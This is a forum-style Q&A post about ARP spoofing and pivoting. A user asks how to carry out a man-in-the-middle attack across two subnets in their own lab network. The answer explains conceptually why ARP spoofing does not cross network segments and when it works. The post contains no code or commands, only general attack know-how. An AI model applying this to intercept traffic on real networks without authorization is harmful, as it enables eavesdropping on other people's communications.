How to perform a mitm-attack in another subnet (ARP Spoofing & pivoting)

Posted on

Problem :

So, I have been trying around with ARP-Spoofing a little and I would like to try to perform a mitm-attack combined with pivoting from one Subnet towards another. My idea:

I have two subnets. I know all the IP-Adresses in both of them and they are connected via the same router. Now I would like to either get access to one of the hosts in the other subnet or (if that’s possible somehow) join it myself and attack. Since this is not a “real” network, but just the one I set up, I know all of the IP-Adresses and I can most likely configure the router the way I want, which might be useful somehow.

Sadly I’m not that good in Networking-stuff and I’m not sure how to do this. I have been Googling around a little and quite a lot of people say that this isn’t possible. Luckily most of them only talk about ARP-Spoofing itself (without the pivoting-part). Is there a possibility or does someone have a hint for me, where I can look it ?

Solution :

Assuming the 2 subnets are on different network segments, and you are not hacking into the router which connects both network, pivoting won’t help you.

As far as I can tell, all pivoting means is using access to an internal system to then gain access to other internal systems – As the systems are on separate networks, you can’t use this strategy to jump from 1 subnet to another because ARP traffic generally does not cross between network segments (and if it did, you would somehow have configured it specifically on the router for an edge case)

On the other hand, if both networks are running on the same segment, you can simply do arp spoofing without pivoting, as all the machines can see each others ARP and MAC traffic.

Leave a Reply

Your email address will not be published. Required fields are marked *